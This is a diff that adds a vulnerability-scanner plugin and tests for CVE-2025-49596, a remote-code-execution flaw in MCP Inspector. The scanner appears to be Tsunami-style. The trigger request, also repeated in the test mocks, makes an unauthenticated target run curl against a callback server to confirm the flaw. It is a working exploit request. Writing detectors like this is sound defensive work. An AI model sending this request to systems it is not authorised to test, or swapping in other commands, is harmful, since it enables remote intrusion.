diff --git a/templated/templateddetector/plugins/cve/2025/MCP_Inspector_CVE_2025_49596.textproto b/templated/templateddetector/plugins/cve/2025/MCP_Inspector_CVE_2025_49596.textproto
new file mode 100644
index 000000000..e34290842
--- /dev/null
+++ b/templated/templateddetector/plugins/cve/2025/MCP_Inspector_CVE_2025_49596.textproto
@@ -0,0 +1,84 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+ type: VULN_DETECTION
+ name: "MCP_Inspector_CVE_2025_49596"
+ author: "frkngksl"
+ version: "1.0"
+}
+
+finding: {
+ main_id: {
+ publisher: "GOOGLE"
+ value: "CVE-2025-49596"
+ }
+ severity: CRITICAL
+ title: "Remote code execution affecting MCP Inspector (CVE-2025-49596)"
+ description: "The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio."
+ recommendation: "Update the version to 0.14.1 or later."
+ related_id: {
+ publisher: "CVE"
+ value: "CVE-2025-49596"
+ }
+}
+
+config: {}
+
+###########
+# ACTIONS #
+###########
+
+actions: {
+ name: "fingerprint_mcpinspector"
+ http_request: {
+ method: GET
+ uri: "/"
+ response: {
+ expect_all: {
+ conditions: [
+ { header: { name: "Access-Control-Expose-Headers" } contains: "mcp-session-id" }
+ ]
+ }
+ }
+ }
+}
+
+actions: {
+ name: "trigger_code_execution"
+ http_request: {
+ method: GET
+ uri: "/sse?transportType=stdio&command=curl&args={{ T_CBS_URI }}"
+ response: {
+ http_status: 200
+ expect_all: {
+ conditions: [
+ { body: {} contains: "sessionId=" }
+ ]
+ }
+ }
+ }
+}
+
+actions: {
+ name: "check_callback_server_logs"
+ callback_server: { action_type: CHECK }
+}
+
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+ condition: REQUIRES_CALLBACK_SERVER
+ actions: [
+ "fingerprint_mcpinspector",
+ "trigger_code_execution",
+ "check_callback_server_logs"
+ ]
+}
diff --git a/templated/templateddetector/plugins/cve/2025/MCP_Inspector_CVE_2025_49596_test.textproto b/templated/templateddetector/plugins/cve/2025/MCP_Inspector_CVE_2025_49596_test.textproto
new file mode 100644
index 000000000..e7f514150
--- /dev/null
+++ b/templated/templateddetector/plugins/cve/2025/MCP_Inspector_CVE_2025_49596_test.textproto
@@ -0,0 +1,82 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+ tested_plugin: "MCP_Inspector_CVE_2025_49596"
+}
+
+tests: {
+ name: "whenVulnerable_returnsTrue"
+ expect_vulnerability: true
+
+ mock_callback_server: {
+ enabled: true
+ has_interaction: true
+ }
+
+ mock_http_server: {
+ mock_responses: [
+ {
+ uri: "/"
+ status: 404
+ headers: [
+ { name: "Access-Control-Expose-Headers" value: "mcp-session-id" }
+ ]
+ body_content: "\n\n\n\nError\n\n\nCannot GET /
\n\n\n"
+ },
+ {
+ uri: "/sse?transportType=stdio&command=curl&args={{ T_CBS_URI }}"
+ status: 200
+ body_content: "event: endpoint\ndata: /message?sessionId=c868d434-b75d-49cb-9f91-ca9d2c86e518"
+ }
+ ]
+ }
+}
+
+tests: {
+ name: "whenNoCallback_returnsFalse"
+ expect_vulnerability: false
+
+ mock_callback_server: {
+ enabled: true
+ has_interaction: false
+ }
+
+ mock_http_server: {
+ mock_responses: [
+ {
+ uri: "/"
+ status: 404
+ headers: [
+ { name: "Access-Control-Expose-Headers" value: "mcp-session-id" }
+ ]
+ body_content: "\n\n\n\nError\n\n\nCannot GET /
\n\n\n"
+ },
+ {
+ uri: "/sse?transportType=stdio&command=curl&args={{ T_CBS_URI }}"
+ status: 401
+ body_content: "{\"error\":\"Unauthorized\",\"message\":\"Authentication required. Use the session token shown in the console when starting the server.\"}"
+ }
+ ]
+ }
+}
+
+tests: {
+ name: "whenNotMCP_Inspector_returnsFalse"
+ expect_vulnerability: false
+
+ mock_callback_server: {
+ enabled: true
+ has_interaction: true
+ }
+
+ mock_http_server: {
+ mock_responses: [
+ {
+ uri: "TSUNAMI_MAGIC_ANY_URI"
+ status: 200
+ body_content: "Hello world"
+ }
+ ]
+ }
+}